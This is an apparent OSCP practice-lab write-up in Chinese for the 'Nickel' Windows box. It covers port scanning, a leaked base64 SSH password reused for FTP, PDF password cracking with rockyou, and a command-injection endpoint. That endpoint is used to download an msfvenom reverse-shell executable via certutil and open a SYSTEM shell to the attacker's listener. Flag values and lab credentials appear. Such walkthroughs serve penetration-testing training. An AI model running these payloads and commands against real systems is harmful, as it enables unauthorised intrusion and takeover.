OSCP靶场–Nickel

考点(1.POST方法请求信息 2.ftp，ssh密码复用 3.pdf文件密码爆破)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.237.99 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-22 04:06 EST
Nmap scan report for 192.168.237.99
Host is up (0.25s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_  256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-01-29T02:08:16
|_Not valid after:  2024-07-30T02:08:16
|_ssl-date: 2024-02-22T09:10:45+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2024-02-22T09:09:32+00:00
5040/tcp  open  unknown
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-22T09:09:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.78 seconds

2. user priv

### 无响应：
http://192.168.237.99:33333/
##
http://192.168.237.99:8089/
## 查看源码：
<h1>DevOps Dashboard</h1>
<hr>
<form action='http://169.254.153.224:33333/list-current-deployments' method='GET'>
<input type='submit' value='List Current Deployments'>
</form>
<br>
<form action='http://169.254.153.224:33333' method='GET'>
<input type='submit' value='List Running Processes'>
</form>
<br>
<form action='http://169.254.153.224:33333/list-active-nodes' method='GET'>
<input type='submit' value='List Active Nodes'>
</form>
<hr>

访问无响应：http://169.254.153.224:33333/list-current-deployments
将url拼接到：http://192.168.237.99:33333/list-running-procs

GET方法变POST方法：

2.1 发现敏感信息：

cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 

"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

base64解码：https://base64.us/

2.2 ssh登陆

ariah:NowiseSloopTheory139
ssh ariah@192.168.237.99

##
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>whoami
nickel\ariah

ariah@NICKEL C:\Users\ariah>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.237.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.237.254

ariah@NICKEL C:\Users\ariah>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah

10/15/2020  06:23 AM    <DIR>          .
10/15/2020  06:23 AM    <DIR>          ..
10/15/2020  06:23 AM    <DIR>          3D Objects
10/15/2020  06:23 AM    <DIR>          Contacts
04/14/2022  03:46 AM    <DIR>          Desktop
10/15/2020  06:23 AM    <DIR>          Documents
10/15/2020  06:23 AM    <DIR>          Downloads
10/15/2020  06:23 AM    <DIR>          Favorites
10/15/2020  06:23 AM    <DIR>          Links
10/15/2020  06:23 AM    <DIR>          Music
10/15/2020  06:25 AM    <DIR>          Pictures
10/15/2020  06:23 AM    <DIR>          Saved Games
10/15/2020  06:24 AM    <DIR>          Searches
10/15/2020  06:23 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,659,962,368 bytes free

ariah@NICKEL C:\Users\ariah>cd Desktop

ariah@NICKEL C:\Users\ariah\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah\Desktop

04/14/2022  03:46 AM    <DIR>          .
04/14/2022  03:46 AM    <DIR>          ..
02/21/2024  11:40 PM                34 local.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,659,962,368 bytes free

##
ariah@NICKEL C:\Users\ariah\Desktop>type local.txt
bc4d84f298cb790dc02b6513b767a143

3. root priv

windows提权：

3.1 winpeas.exe无发现有效信息：

ariah@NICKEL C:\Users\ariah\Desktop>certutil -urlcache -split -f http://192.168.45.234/winpeas.exe
###
ariah@NICKEL C:\Users\ariah\Desktop>winpeas.exe

3.2 ssh密码复用：登陆ftp:ariah:NowiseSloopTheory139

┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.178.99                        
Connected to 192.168.178.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.178.99:root): ariah
331 Password required for ariah
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61706|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> get Infrastructure.pdf
local: Infrastructure.pdf remote: Infrastructure.pdf
229 Entering Extended Passive Mode (|||50539|)
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |********************************************************************| 46235       33.65 KiB/s    00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:01 (33.65 KiB/s)

## pdf爆破：
┌──(root㉿kali)-[~/Desktop]
└─# pdfcrack Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt 
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 43868.9 w/s. Current Word: 'loritta30'
Average Speed: 44370.4 w/s. Current Word: 'graff01'
Average Speed: 44473.4 w/s. Current Word: 'xxxppp'
Average Speed: 44165.3 w/s. Current Word: 'stellyme'
Average Speed: 44073.3 w/s. Current Word: 'rachel41987'
Average Speed: 44192.8 w/s. Current Word: 'music_girl'
Average Speed: 44549.9 w/s. Current Word: 'lilneisy'
Average Speed: 44240.4 w/s. Current Word: 'jen5878'
Average Speed: 44587.6 w/s. Current Word: 'gagicumaiubeste'
Average Speed: 44437.6 w/s. Current Word: 'd.staley'
Average Speed: 44317.7 w/s. Current Word: 'bd82CC*^'
found user-password: 'ariah4168'

## 使用pdf2john,johnpdf破解pdf:
┌──(root㉿kali)-[~/Desktop]
└─# pdf2john Infrastructure.pdf > 1.hash
                                                                                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168        (Infrastructure.pdf)     
1g 0:00:00:57 DONE (2024-02-24 03:37) 0.01734g/s 173563p/s 173563c/s 173563C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed. 

### pdf内容：
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files

破解加密的pdf:

pdf内容：

修改hosts文件：

高权限命令接口：

3.3 反弹shell

## 生成木马
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe


┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80

## 下载木马：
http://nickel/?certutil%20-urlcache%20-split%20-f%20http://192.168.45.179/shell443.exe

## 监听：
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443  

## 执行反弹：
http://nickel/?shell443.exe

## proof.txt
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443              
listening on [any] 443 ...
connect to [192.168.45.179] from nickel [192.168.178.99] 50199
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.178.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.178.254

c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
3e0fd8269fd99aaac34829668016651a

4.总结考点

### 1.POST方法请求信息
### 2.ftp，ssh密码复用
### 3.pdf文件密码爆破
###